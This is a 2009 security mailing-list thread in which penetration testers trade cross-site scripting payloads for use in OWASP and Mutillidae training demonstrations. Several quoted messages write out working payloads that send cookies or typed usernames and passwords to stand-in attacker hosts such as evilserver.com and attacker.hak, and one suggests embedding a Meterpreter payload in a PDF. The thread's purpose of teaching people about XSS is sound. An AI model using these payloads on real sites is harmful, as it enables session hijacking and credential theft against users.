While all these samples are really fun, I've lately had great luck by making two different XSS attacks when I'm showing folks.
One for the devs -- this tends to be a bit more "fun" and does stuff like click trapping. For marketing or the project managers -- the ones I've found most likely to sweep these bugs under the rug -- I send them "brand damage" examples. (Cock ring size is freaking hilarious, but would send me to HR). So I do things like image swapping, or setting the background to a LOLCat or a competitor logo. The all time XSS FTW moment was about 4 years ago now, when someone found an XSS problem on a McDonald's site. Their link was so damn sweet, it's what got me interested in web app security. when you clicked it, you we sent to a page that had all the McD's wrappings but the content section of the window was blank except for in lovely red letters it said: "Hey FATTIE! You really shouldn't be eating our food!" On Fri, May 29, 2009 at 3:35 AM, <[email protected]> wrote: > You could use a couple of typical password/cookie stealing examples. > > Cookie stealing iframe.: > "><IFRAME > SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie"; > height="1" width="1" frameborder="0"></IFRAME> > > Altering the logon form.: > "><script>window.onload = > function()document.loginForm.action='http://evilserver.com/evil.php?details='</script><!---- > > I like to use the logon form example for my penetration testing > presentations as it looks 100% normal to the user, except it redirects the > Submit button to send the logon information (username/password in most > cases) to your evilserver instead of the real server. You can also rewrite > the code in the users browser to remove password hashing to make it easier > to get the clear text password. On the server end I usually just put up a > Metasploit HTTP or a netcat listener on the evilserver.com address to output > the traffic to a logfile. You can also log it to a Database for mass farming > of data, but we don't do that kind of thing, we leave that to Bob ;) > > If you want something evil on the client-side, try an iframe that references > a PDF file. You can then export a PDF from Metasploit and embed the > Meterpreter payload for total world domination. > > Chris John Riley > > [email protected]@inet wrote on 28.05.2009 20:50:39: > >> Ok, I've got yet another presentation coming up, this time on the OWASP >> Top 10 >> and Mutillidae. One of the things I'm going to cover is XSS. The canonical >> example of course is: >> >> <script>alert("XSS");</script> >> >> but that is boring, and gives folks the impression that XSS is not that >> serious. Better short eample swoul be: >> >> Redirect traffic to your site: >> <script>window.location = "http://www.irongeek.com/";</script> >> >> A little cookie Grabbing: >> <script> >> new Image().src="http://some-ip/mutillidae/catch.php?cookie= >> "+encodeURI(document.cookie); >> </script> >> >> Or maybe a password form to make people think they have to login, but it >> just >> grabs the credentials: >> <script> >> username=prompt('Please enter your username',' '); >> password=prompt('Please enter your password',' '); >> document.write("<img src=\"http://attacker.hak/catch.php?username= >> "+username+"&password="+password+"\">"); >> </script> >> >> What are other cool thing to inject, besides maybe BeEF, that shows of how >> XSS >> can be a big deal? >> >> Thanks, >> Adrian >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com > ---------------------------------------- > Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien, DVR > 0486809, UID ATU 16351908 > > Der Austausch von Nachrichten mit oben angefuehrtem Absender via E-Mail > dient ausschliesslich Informationszwecken. Rechtsgeschaeftliche Erklaerungen > duerfen ueber dieses Medium nicht ausgetauscht werden. > Correspondence with above mentioned sender via e-mail is only for > information purposes. This medium may not be used for exchange of > legally-binding communications. > ---------------------------------------- > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
